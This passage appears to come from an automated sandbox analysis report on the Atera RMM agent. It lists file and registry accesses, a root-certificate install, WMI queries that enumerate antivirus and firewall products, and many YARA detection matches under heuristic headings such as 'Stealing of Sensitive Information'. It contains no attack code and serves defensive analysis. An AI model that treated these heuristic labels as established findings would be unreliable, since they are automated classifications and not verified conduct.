Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIEE25.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIEE25.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIF48E.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Installer\MSIF48E.tmp-\Newtonsoft.Json.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0E8CC04 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

36_2_00007FFDF0E8CC04

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0E885D4 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,_malloc_crt,_invoke_watson,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,

36_2_00007FFDF0E885D4

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct

Stealing of Sensitive Information

Queries disk data (e.g. SMART data)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Device IO: \Device\Harddisk0\DR0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Device IO: \Device\Harddisk0\DR0

Remote Access Functionality

Yara detected AteraAgent

Source: Yara match	File source: 49.0.AgentPackageTicketing.exe.21f24c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.AgentPackageHeartbeat.exe.2a3326a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.AteraAgent.exe.21679140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.0.AgentPackageProgramManagement.exe.11cb23f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.0.AgentPackageUpgradeAgent.exe.19f9b460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.AgentPackageProgramManagement.exe.11cb2860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AgentPackageAgentInformation.exe.28a55610000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.AgentPackageTicketing.exe.21f24fc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.AgentPackageMonitoring.exe.247f7740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.AteraAgent.exe.251005e55a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.AgentPackageMonitoring.exe.247f80b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.AgentPackageTicketing.exe.21f25450000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.AgentPackageSTRemote.exe.23071930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.AteraAgent.exe.25100607280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.AteraAgent.exe.2510073d310.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.AgentPackageAgentInformation.exe.28a55180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2295300733.00000150D7D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500686000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2684946960.00000256F0270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.3071172900.0000011CCB8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2945403740.0000023000103000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2950479205.0000011CB267B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2684946960.00000256F02AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.3071172900.0000011CCB994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251007EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2684509702.00000256F00F0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748549728.0000025179520000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2773115836.00000175695DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.000002568056B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2568740282.000002A332560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2773306481.0000017568C6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2790630051.0000019F9B825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2216815750.00000247F80B2000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2376289826.000001C2ECC42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EADE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.0000025680291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2574946100.000002A332F6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2755851188.00000251797A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2792340884.0000019F9BDD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256806B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2215218351.00000247F78FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2684946960.00000256F0279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5003CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2389774485.000001A571020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2950479205.0000011CB2660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2062023214.0000020593C13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2282885543.00000150BEB40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2959967740.0000021F24FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251004CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2785759950.0000019F9B630000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256806F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2061211828.0000020593298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2773115836.00000175695E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2774336632.0000017568C71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EADFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2999483708.0000023071BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2392637897.000001F751BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3009834165.0000023071E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2369172218.000001C2EAE6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2397219667.000001A5723D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2385596719.000001A570E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2061211828.00000205932AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2455544706.000001F751A70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2215218351.00000247F78F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2450784251.0000028A191AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100862000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2513427313.000001F14A4A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517AB75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2352910675.000001C280001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2568740282.000002A33263C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517ABBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2785759950.0000019F9B664000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2713672868.0000017569510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1848077610.000002167B6E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2945403740.0000023000111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2038194012.0000028A6E48E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1846105414.00000216792CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2508147012.000001F14A301000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2385596719.000001A570E86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2061858920.0000020593520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB3363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.0000021600001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2516150200.000001F14ADE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2408792996.00007FFDF11A9000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.0000021600132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.0000021600089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2455730867.000001F751B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2352910675.000001C280010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2691494022.00000256F1230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2036704581.0000028A55300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2568740282.000002A3325EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2794634831.0000019F9BFDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1845968252.0000021679290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2220490149.00000247F9856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2761360886.000002517A740000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2281891177.00000150BEA4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3208734070.0000021F3DE16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2549890793.000001F1633B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB341B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2794634831.0000019F9BFC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2354939972.00000043E54F5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2283587990.00000150BF464000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2516150200.000001F14AC61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2216475348.00000247F7BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2950479205.0000011CB2748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2773192747.00000175695E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2385596719.000001A570E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2950479205.0000011CB2668000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.0000025680001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2453247953.0000028A199A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2962491449.0000021F257E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2761043013.00007FFDF11B0000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2450784251.0000028A19178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2220335636.00000247F9647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2450784251.0000028A19170000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2385523899.000001A570DF0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2695822328.00000256F20C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2784817989.0000019F9B610000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.00000256806F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2548326525.000001F16334E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2455544706.000001F751A94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2748747455.0000025179560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2947253751.0000021F24E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2568740282.000002A3325AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2999483708.0000023071B8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2785759950.0000019F9B702000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2453247953.0000028A19921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517AB5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2220369033.00000247F9845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2152982733.00000199E50E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2061211828.00000205932CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2508147012.000001F14A2FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.2774555804.00000175695E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2211260331.0000024780001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2770892227.000002517AB00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2945403740.000002300007B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.0000021600135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2217394716.00000247F88AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2941505779.000000E8E6581000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2773226461.0000017568C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2356972366.000001A500084000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2217394716.00000247F8880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2516150200.000001F14AD99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB337A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2963836971.0000011CB3399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2791096428.0000019F9B880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2152982733.00000199E50EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2947253751.0000021F24E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2655425408.000002568048A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2037234967.0000028A556C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1844841948.00000216000B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2281891177.00000150BEA10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
